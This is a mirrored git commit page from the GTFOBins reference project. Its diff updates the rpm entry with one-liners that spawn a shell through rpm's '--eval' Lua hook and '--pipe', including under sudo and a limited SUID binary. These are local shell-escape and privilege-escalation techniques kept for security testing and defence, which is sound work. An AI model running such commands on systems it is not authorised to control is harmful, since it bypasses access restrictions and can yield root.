mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Upgrade to shell
This commit is contained in:
parent
ecb1840df3
commit
9800048833
@ -2,12 +2,9 @@
|
|||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
command:
|
- code: rpm --pipe '/bin/sh 0<&1'
|
||||||
- code: |
|
|
||||||
rpm --pipe '/bin/id > /tmp/result'
|
|
||||||
cat /tmp/result
|
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
- description: |
|
- description: |
|
||||||
|
Loading…
Reference in New Issue
Block a user